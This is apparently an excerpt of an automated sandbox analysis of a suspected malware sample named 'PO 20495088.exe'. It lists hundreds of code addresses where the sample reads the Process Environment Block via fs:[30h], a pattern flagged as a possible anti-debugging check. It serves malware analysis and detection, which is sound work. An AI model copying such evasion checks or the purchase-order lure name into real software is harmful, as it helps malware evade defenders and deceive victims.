                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0172208A mov eax, dword ptr fs:[00000030h] 6_2_0172208A
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C437C mov eax, dword ptr fs:[00000030h] 6_2_017C437C
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A035C mov eax, dword ptr fs:[00000030h] 6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A035C mov ecx, dword ptr fs:[00000030h] 6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EA352 mov eax, dword ptr fs:[00000030h] 6_2_017EA352
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C8350 mov ecx, dword ptr fs:[00000030h] 6_2_017C8350
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h] 6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171C310 mov ecx, dword ptr fs:[00000030h] 6_2_0171C310
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01740310 mov ecx, dword ptr fs:[00000030h] 6_2_01740310
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175A30B mov eax, dword ptr fs:[00000030h] 6_2_0175A30B
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0173E3F0 mov eax, dword ptr fs:[00000030h] 6_2_0173E3F0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017563FF mov eax, dword ptr fs:[00000030h] 6_2_017563FF
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h] 6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CE3DB mov eax, dword ptr fs:[00000030h] 6_2_017CE3DB
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CE3DB mov ecx, dword ptr fs:[00000030h] 6_2_017CE3DB
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C43D4 mov eax, dword ptr fs:[00000030h] 6_2_017C43D4
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017DC3CD mov eax, dword ptr fs:[00000030h] 6_2_017DC3CD
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017283C0 mov eax, dword ptr fs:[00000030h]6_2_017283C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A63C0 mov eax, dword ptr fs:[00000030h]6_2_017A63C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718397 mov eax, dword ptr fs:[00000030h]6_2_01718397
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718397 mov eax, dword ptr fs:[00000030h]6_2_01718397
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718397 mov eax, dword ptr fs:[00000030h]6_2_01718397
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E388 mov eax, dword ptr fs:[00000030h]6_2_0171E388
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E388 mov eax, dword ptr fs:[00000030h]6_2_0171E388
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E388 mov eax, dword ptr fs:[00000030h]6_2_0171E388
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174438F mov eax, dword ptr fs:[00000030h]6_2_0174438F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174438F mov eax, dword ptr fs:[00000030h]6_2_0174438F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D0274 mov eax, dword ptr fs:[00000030h]6_2_017D0274
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724260 mov eax, dword ptr fs:[00000030h]6_2_01724260
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724260 mov eax, dword ptr fs:[00000030h]6_2_01724260
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724260 mov eax, dword ptr fs:[00000030h]6_2_01724260
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171826B mov eax, dword ptr fs:[00000030h]6_2_0171826B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171A250 mov eax, dword ptr fs:[00000030h]6_2_0171A250
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726259 mov eax, dword ptr fs:[00000030h]6_2_01726259
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA250 mov eax, dword ptr fs:[00000030h]6_2_017DA250
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA250 mov eax, dword ptr fs:[00000030h]6_2_017DA250
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A8243 mov eax, dword ptr fs:[00000030h]6_2_017A8243
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A8243 mov ecx, dword ptr fs:[00000030h]6_2_017A8243
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171823B mov eax, dword ptr fs:[00000030h]6_2_0171823B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302E1 mov eax, dword ptr fs:[00000030h]6_2_017302E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302E1 mov eax, dword ptr fs:[00000030h]6_2_017302E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302E1 mov eax, dword ptr fs:[00000030h]6_2_017302E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A2C3 mov eax, dword ptr fs:[00000030h]6_2_0172A2C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302A0 mov eax, dword ptr fs:[00000030h]6_2_017302A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017302A0 mov eax, dword ptr fs:[00000030h]6_2_017302A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov ecx, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B62A0 mov eax, dword ptr fs:[00000030h]6_2_017B62A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E284 mov eax, dword ptr fs:[00000030h]6_2_0175E284
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E284 mov eax, dword ptr fs:[00000030h]6_2_0175E284
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A0283 mov eax, dword ptr fs:[00000030h]6_2_017A0283
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A0283 mov eax, dword ptr fs:[00000030h]6_2_017A0283
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A0283 mov eax, dword ptr fs:[00000030h]6_2_017A0283
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175656A mov eax, dword ptr fs:[00000030h]6_2_0175656A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175656A mov eax, dword ptr fs:[00000030h]6_2_0175656A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175656A mov eax, dword ptr fs:[00000030h]6_2_0175656A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728550 mov eax, dword ptr fs:[00000030h]6_2_01728550
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728550 mov eax, dword ptr fs:[00000030h]6_2_01728550
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730535 mov eax, dword ptr fs:[00000030h]6_2_01730535
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E53E mov eax, dword ptr fs:[00000030h]6_2_0174E53E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B6500 mov eax, dword ptr fs:[00000030h]6_2_017B6500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4500 mov eax, dword ptr fs:[00000030h]6_2_017F4500
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017225E0 mov eax, dword ptr fs:[00000030h]6_2_017225E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E5E7 mov eax, dword ptr fs:[00000030h]6_2_0174E5E7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C5ED mov eax, dword ptr fs:[00000030h]6_2_0175C5ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C5ED mov eax, dword ptr fs:[00000030h]6_2_0175C5ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017265D0 mov eax, dword ptr fs:[00000030h]6_2_017265D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A5D0 mov eax, dword ptr fs:[00000030h]6_2_0175A5D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A5D0 mov eax, dword ptr fs:[00000030h]6_2_0175A5D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E5CF mov eax, dword ptr fs:[00000030h]6_2_0175E5CF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E5CF mov eax, dword ptr fs:[00000030h]6_2_0175E5CF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017445B1 mov eax, dword ptr fs:[00000030h]6_2_017445B1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017445B1 mov eax, dword ptr fs:[00000030h]6_2_017445B1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A05A7 mov eax, dword ptr fs:[00000030h]6_2_017A05A7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A05A7 mov eax, dword ptr fs:[00000030h]6_2_017A05A7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A05A7 mov eax, dword ptr fs:[00000030h]6_2_017A05A7
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E59C mov eax, dword ptr fs:[00000030h]6_2_0175E59C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01722582 mov eax, dword ptr fs:[00000030h]6_2_01722582
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01722582 mov ecx, dword ptr fs:[00000030h]6_2_01722582
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01754588 mov eax, dword ptr fs:[00000030h]6_2_01754588
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174A470 mov eax, dword ptr fs:[00000030h]6_2_0174A470
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174A470 mov eax, dword ptr fs:[00000030h]6_2_0174A470
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174A470 mov eax, dword ptr fs:[00000030h]6_2_0174A470
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AC460 mov ecx, dword ptr fs:[00000030h]6_2_017AC460
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA456 mov eax, dword ptr fs:[00000030h]6_2_017DA456
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171645D mov eax, dword ptr fs:[00000030h]6_2_0171645D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174245A mov eax, dword ptr fs:[00000030h]6_2_0174245A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175E443 mov eax, dword ptr fs:[00000030h]6_2_0175E443
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A430 mov eax, dword ptr fs:[00000030h]6_2_0175A430
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E420 mov eax, dword ptr fs:[00000030h]6_2_0171E420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E420 mov eax, dword ptr fs:[00000030h]6_2_0171E420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171E420 mov eax, dword ptr fs:[00000030h]6_2_0171E420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171C427 mov eax, dword ptr fs:[00000030h]6_2_0171C427
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6420 mov eax, dword ptr fs:[00000030h]6_2_017A6420
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758402 mov eax, dword ptr fs:[00000030h]6_2_01758402
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758402 mov eax, dword ptr fs:[00000030h]6_2_01758402
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758402 mov eax, dword ptr fs:[00000030h]6_2_01758402
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017204E5 mov ecx, dword ptr fs:[00000030h]6_2_017204E5
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017544B0 mov ecx, dword ptr fs:[00000030h]6_2_017544B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AA4B0 mov eax, dword ptr fs:[00000030h]6_2_017AA4B0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017264AB mov eax, dword ptr fs:[00000030h]6_2_017264AB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DA49A mov eax, dword ptr fs:[00000030h]6_2_017DA49A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728770 mov eax, dword ptr fs:[00000030h]6_2_01728770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730770 mov eax, dword ptr fs:[00000030h]6_2_01730770
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720750 mov eax, dword ptr fs:[00000030h]6_2_01720750
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762750 mov eax, dword ptr fs:[00000030h]6_2_01762750
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762750 mov eax, dword ptr fs:[00000030h]6_2_01762750
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AE75D mov eax, dword ptr fs:[00000030h]6_2_017AE75D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A4755 mov eax, dword ptr fs:[00000030h]6_2_017A4755
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175674D mov esi, dword ptr fs:[00000030h]6_2_0175674D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175674D mov eax, dword ptr fs:[00000030h]6_2_0175674D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175674D mov eax, dword ptr fs:[00000030h]6_2_0175674D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175273C mov eax, dword ptr fs:[00000030h]6_2_0175273C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175273C mov ecx, dword ptr fs:[00000030h]6_2_0175273C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175273C mov eax, dword ptr fs:[00000030h]6_2_0175273C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179C730 mov eax, dword ptr fs:[00000030h]6_2_0179C730
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C720 mov eax, dword ptr fs:[00000030h]6_2_0175C720
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C720 mov eax, dword ptr fs:[00000030h]6_2_0175C720
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720710 mov eax, dword ptr fs:[00000030h]6_2_01720710
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01750710 mov eax, dword ptr fs:[00000030h]6_2_01750710
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C700 mov eax, dword ptr fs:[00000030h]6_2_0175C700
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017247FB mov eax, dword ptr fs:[00000030h]6_2_017247FB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017247FB mov eax, dword ptr fs:[00000030h]6_2_017247FB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017427ED mov eax, dword ptr fs:[00000030h]6_2_017427ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017427ED mov eax, dword ptr fs:[00000030h]6_2_017427ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017427ED mov eax, dword ptr fs:[00000030h]6_2_017427ED
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AE7E1 mov eax, dword ptr fs:[00000030h]6_2_017AE7E1
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172C7C0 mov eax, dword ptr fs:[00000030h]6_2_0172C7C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A07C3 mov eax, dword ptr fs:[00000030h]6_2_017A07C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017207AF mov eax, dword ptr fs:[00000030h]6_2_017207AF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D47A0 mov eax, dword ptr fs:[00000030h]6_2_017D47A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C678E mov eax, dword ptr fs:[00000030h]6_2_017C678E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01752674 mov eax, dword ptr fs:[00000030h]6_2_01752674
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E866E mov eax, dword ptr fs:[00000030h]6_2_017E866E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E866E mov eax, dword ptr fs:[00000030h]6_2_017E866E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A660 mov eax, dword ptr fs:[00000030h]6_2_0175A660
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A660 mov eax, dword ptr fs:[00000030h]6_2_0175A660
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173C640 mov eax, dword ptr fs:[00000030h]6_2_0173C640
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E627 mov eax, dword ptr fs:[00000030h]6_2_0173E627
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01756620 mov eax, dword ptr fs:[00000030h]6_2_01756620
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758620 mov eax, dword ptr fs:[00000030h]6_2_01758620
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172262C mov eax, dword ptr fs:[00000030h]6_2_0172262C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01762619 mov eax, dword ptr fs:[00000030h]6_2_01762619
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E609 mov eax, dword ptr fs:[00000030h]6_2_0179E609
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
